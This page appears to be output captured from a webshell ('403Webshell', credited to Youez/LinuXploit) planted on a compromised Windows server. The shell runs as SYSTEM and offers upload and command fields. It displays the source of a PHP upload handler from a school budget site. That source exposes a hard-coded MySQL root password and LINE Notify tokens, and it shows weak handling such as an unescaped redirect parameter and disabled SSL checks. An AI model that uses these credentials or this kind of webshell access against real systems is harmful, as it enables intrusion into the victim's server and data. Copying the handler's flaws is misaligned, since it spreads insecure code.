403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www//news/building_add_save.php
<meta http-equiv="Content-Type" content="text/php; charset=utf-8" />

<?php
include('db.php');
$id =  $mysqli->escape_string($_GET['id']);
$type= $mysqli->escape_string($_POST['type']);
//echo $id ;
//print_r($_POST);
//print_r($_FILES);


		$file_tmp=$_FILES["petition"]["tmp_name"];	
		$file_name=$_FILES["petition"]["name"];
			$array_last = explode(".",$file_name);
			$c=count($array_last) - 1;
			$lastname=strtolower($array_last[$c]);
		    $filenew =date("Ydm-His"). "_$type_$id." .$lastname;

if ($lastname=="xls" or $lastname=="xlsx" or $lastname=="doc" or $lastname=="docx" or $lastname=="pdf" or $lastname=="jpg" or $lastname=="jpeg" or $lastname=="png") {
		if(move_uploaded_file($file_tmp,"uploads/petition/".$filenew))
		{
			$sql = "INSERT INTO building (s_id, d_file, d_update,type) VALUES ('$id', '".$filenew."', NOW(),'$type' )" ;
//			echo $sql ;
			$mysqli->query($sql) or die ($mysqli->error );				
		} 




$con3 = mysqli_connect("localhost","root","P@ssw0rdMySQL0","budget68") or die("Error: " . mysqli_error($con));
$query3 = "SELECT building.b_id, school.s_school from building INNER JOIN school ON building.s_id = school.s_id";
$result3 = mysqli_query($con3, $query3);
$row3 = mysqli_fetch_array($result3);

						//เริ่มการทำงานส่งลาย	
						//$sToken = "VXKetAyA2u0mjQCOsNjGHtgAhSVAY6n7AwcSwwyqqIb"; ลายทดสอบ
						//$sToken = "PIMAwzpkZ6OExXDVJGVyVjmL52AAFzsiGREmCwYLthc";
						//$sMessage .= "โรงเรียน".$row3["s_school"]." ของบสิ่งก่อสร้าง\n";

					
						
						$chOne = curl_init(); 
						//curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify"); 
						curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0); 
						curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0); 
						curl_setopt( $chOne, CURLOPT_POST, 1); 
						curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message=".$sMessage); 
						$headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$sToken.'', );
						curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers); 
						curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1); 
						$result = curl_exec( $chOne ); 
					
						//Result error 
						if(curl_error($chOne)) 
						{ 
							echo 'error:' . curl_error($chOne); 
						} 
						else { 
							$result_ = json_decode($result, true); 
						} 
						curl_close( $chOne );  
						//จบการทำงานส่งลาย	











/*lineapi

$lineapi = "PIMAwzpkZ6OExXDVJGVyVjmL52AAFzsiGREmCwYLthc";

date_default_timezone_set("Asia/Bangkok");
$chOne = curl_init();
curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify");
curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt( $chOne, CURLOPT_POST, 1); 

// Message

curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message= มีโรงเรียนส่งข้อมูลขอสิ่งก่อสร้าง");
curl_setopt( $chOne, CURLOPT_FOLLOWLOCATION, 1);
$headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$lineapi.'', );
curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers);
curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec( $chOne );
if(curl_error($chOne)) { echo 'error:' . curl_error($chOne); }
else { $result_ = json_decode($result, true);
//echo "status : ".$result_['status']; echo "message : ". $result_['message']; 
}
curl_close( $chOne );
*/
/*end lineapi*/





}





echo "<meta http-equiv=refresh content=0;URL=building.php?id=$id>";




?>

Youez - 2016 - github.com/yon3zu
LinuXploit